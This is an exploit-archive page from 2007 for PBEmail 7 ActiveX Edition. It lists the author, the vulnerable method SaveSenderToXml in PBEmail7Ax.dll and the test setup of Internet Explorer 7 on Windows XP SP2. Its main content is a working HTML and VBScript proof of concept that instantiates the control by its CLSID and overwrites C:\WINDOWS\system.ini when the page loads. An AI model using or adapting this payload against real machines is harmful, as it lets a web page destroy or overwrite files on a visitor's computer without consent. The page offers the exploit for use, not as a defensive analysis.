PBEmail 7 ActiveX Edition Insecure Method Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PBEmail 7 ActiveX Edition Insecure Method Exploit
# Published : 2007-10-12
# Author : Katatafish
# Previous Title : Apache Tomcat (webdav) Remote File Disclosure Exploit
# Next Title : Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit

<pre>
<b>Found by</b>: Katatafish (karatatata{at}hush{dot}com)
<b>software</b>:PBEmail 7 ActiveX Edition
<b>Vendor:</b> http://www.perfectionbytes.com
<b>vulnerability</b>: Insecure method
SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
<b>Tested on Internet explorer 7 with Windows XP SP 2.</b>
<b>Thanks:</b> str0ke

</pre>

<object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC" 
id="kat"></object>	
<script language="vbscript">
  kat.SaveSenderToXml "C:WINDOWSsystem.ini"
  MyMsg = MsgBox ("Done! Your C:WINDOWSsystem.ini file should now 
be overwriten.")
</script>

# www.Syue.com [2007-10-12]